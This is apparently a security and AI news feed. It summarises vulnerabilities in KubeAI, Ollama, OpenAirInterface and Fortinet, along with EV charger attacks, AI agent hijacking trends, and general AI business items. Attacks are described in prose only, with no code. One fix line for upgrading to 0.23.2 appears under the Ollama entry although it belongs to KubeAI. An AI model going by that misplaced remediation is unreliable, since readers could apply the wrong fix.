All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
Economists warn that current tools for predicting AI's impact on jobs are inadequate because they only measure "exposure" (whether AI could theoretically do a job's tasks), which doesn't account for whether employers will actually replace workers or increase productivity instead. Economist Alex Imas calls for collecting new data on how AI actually changes specific jobs and industries, since knowing a job is 28% exposed to AI tells us little about whether that job will disappear, be transformed, or become more productive.
KubeAI, a tool that runs AI models on Kubernetes (a system for managing containerized applications), has a vulnerability in versions before 0.23.2 where attackers can inject malicious shell commands (arbitrary code execution instructions) through Model resource creation. The flaw exists because the ollamaStartupProbeScript() function doesn't properly validate user input when building commands that run during startup checks.
Iran's Islamic Revolutionary Guard Corps (IRGC, a military organization) published a video threatening to destroy OpenAI's Stargate data center in Abu Dhabi if the US attacks Iran's power plants. The threat was posted to social media on April 3rd and specifically showed images of OpenAI's $30 billion facility under construction in the United Arab Emirates.
This piece is an interview with Cisco's CEO about the company's role in building networking infrastructure for AI data centers. The conversation touches on challenges like public opposition to data centers due to noise, appearance, and high electricity use, and explores whether data centers should be built in space to avoid these problems.
OpenAirInterface V2.2.0 AMF (access and mobility management function, a component that handles device connections in 5G networks) crashes when it receives an NGAP message (a protocol used for communication in 5G networks) with an invalid procedure code or incorrect PDU-type (message format indicator). For example, the software crashes if a message is sent in the wrong format, such as using successfulOutcome when InitiatingMessage is required.
This is a business news roundup covering multiple topics, including geopolitical tensions, Federal Reserve leadership, Apple's 50th anniversary, and OpenAI's acquisition of a technology podcast. The content discusses market reactions to potential U.S.-Iran negotiations, an upcoming Senate hearing for a Federal Reserve nominee, Apple's challenges in AI competition and supply chains, and OpenAI's purchase of the TBPN podcast.
Attackers are increasingly exploiting legitimate AI systems and services instead of using traditional malware, a trend called "living off the AI land." Examples include poisoning MCP servers (tools that connect AI assistants to external services) in supply chains, abusing AI platforms like Claude and Copilot as command-and-control channels (hidden pathways for sending malicious instructions), and hijacking AI agents (automated systems that perform tasks) to extract sensitive data or perform destructive actions. The shift represents a fundamental change in AI security threats, moving beyond simple prompt injection (tricking an AI by hiding instructions in its input) to more sophisticated agent hijacking (taking control of automated AI systems).
This item is a brief announcement about 'Cleanup Claude Code Paste,' posted by Simon Willison on April 6, 2026. The provided content does not include substantive details about what the tool does, what problem it addresses, or its significance.
OpenClaw, an open-source AI assistant built by an Austrian developer, sparked a major trend in China in March 2024 because it can be customized to work with Chinese AI models, unlike Western tools like ChatGPT that are inaccessible there. Users enthusiastically adapted OpenClaw's code to create personalized versions they called "lobsters," using them for tasks like e-commerce product listings, stock analysis, and productivity, with some claiming dramatic efficiency gains. The phenomenon reflects China's broader push to develop and embrace AI technology, driven by government support and the success of homegrown platforms like DeepSeek.
Google has integrated Gemini (an AI assistant that's built into Google services) into Google Maps, allowing it to help plan daily itineraries by suggesting nearby locations. The author tested this feature by having Gemini plan a full day around their city and found it effective, discovering both obvious and unexpected recommendations for places to visit.
A vulnerability (CVE-2026-5530) has been discovered in Ollama up to version 18.1 that allows attackers to perform SSRF (server-side request forgery, where an attacker tricks a server into making unwanted requests on their behalf) through the Model Pull API component. The flaw can be exploited remotely by authenticated users, and the vendor has not responded to disclosure attempts.
Fix: Upgrade to version 0.23.2 or later, which fixes this vulnerability.
NVD/CVE DatabaseResearchers at Google DeepMind have identified a vulnerability called 'AI Agent Traps' that allows attackers to manipulate and exploit AI agents (autonomous programs that can browse the web and take actions) by hosting malicious web content designed to deceive them. This research maps out how these attacks work against AI systems that visit websites.
Healthcare workers are increasingly using AI tools on their own to handle heavy workloads, and organizations cannot stop this trend. The source emphasizes that healthcare organizations should strengthen their security practices to reduce the damage if these unsanctioned AI tools are compromised or misused.
OWASP (Open Web Application Security Project, a standards group for security best practices) has updated its generative AI security guidance to address 21 identified risks in AI systems. The update recommends that companies use separate but coordinated defense strategies tailored specifically for generative AI (AI that creates text, images, or code) and agentic AI (AI that can take actions independently).
MaliVD is a deep learning method that detects vulnerabilities (security flaws) in source code and identifies exactly which lines contain them, using a multi-modal attention mechanism (a technique that lets the AI focus on important parts of code by analyzing it in multiple ways, like looking at the code's sequence, tree structure, and relationships between components). Traditional security tools create too many false alarms and struggle with complex modern software, but MaliVD performs better than eight other detection methods by extracting different types of code features and prioritizing suspicious sections.
Researchers discovered that the SAE J1772 charging control protocol, which manages communication between electric vehicle chargers and cars, lacks proper authentication (verification that devices are who they claim to be). They created ChargeX, a hardware attack that modifies charging control signals to disrupt charging schedules, cause denial of service (DoS, making systems unavailable), or damage batteries. Tests on Tesla chargers and home chargers showed the attacks can force unwanted charging states or crash chargers into error states.
This research paper presents VM-DSSE-FB, a new encryption method for cloud storage that lets multiple users search and update encrypted data while maintaining privacy. The system uses techniques like symmetric encryption (encoding data with a shared secret key), homomorphic addition (performing calculations on encrypted data without decrypting it first), and bitmap indexing (a method for organizing data searches) to protect against certain attacks and verify that search results are accurate and complete.
OpenAI is launching a Safety Fellowship program (September 2026 to February 2027) for external researchers to conduct independent studies on safety and alignment (making sure AI systems behave as intended and don't cause harm) of advanced AI systems. Fellows will work on topics like safety evaluation, ethics, robustness, privacy protection, and oversight of AI agents, receiving mentorship, compute resources, and a monthly stipend while producing research outputs like papers or datasets.
Commercial off-the-shelf software (COTS, meaning ready-made software products sold online or in stores) initially seems attractive because it deploys quickly and costs less than custom development, but organizations often get trapped when they want to switch platforms, as their systems become deeply entangled with the vendor's technology. AI-powered security tools are creating a new type of lock-in by relying on proprietary training data, vendor-specific threat intelligence feeds (collections of indicators showing cyber attacks), and specialized hardware, making it expensive and difficult to migrate away.
Fortinet FortiClient EMS has an improper access control vulnerability (a flaw in how the software checks who is allowed to do what) that lets unauthenticated attackers (people without login credentials) run unauthorized code or commands through specially crafted requests. This vulnerability is actively being exploited by attackers in real-world attacks.
Fix: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable. Check for signs of potential compromise on all internet accessible Fortinet products affected by this vulnerability. Apply any final mitigations provided by the vendor as soon as they become available. For vendor-specific patches and remediation steps, see: https://fortiguard.fortinet.com/psirt/FG-IR-26-099
CISA Known Exploited Vulnerabilities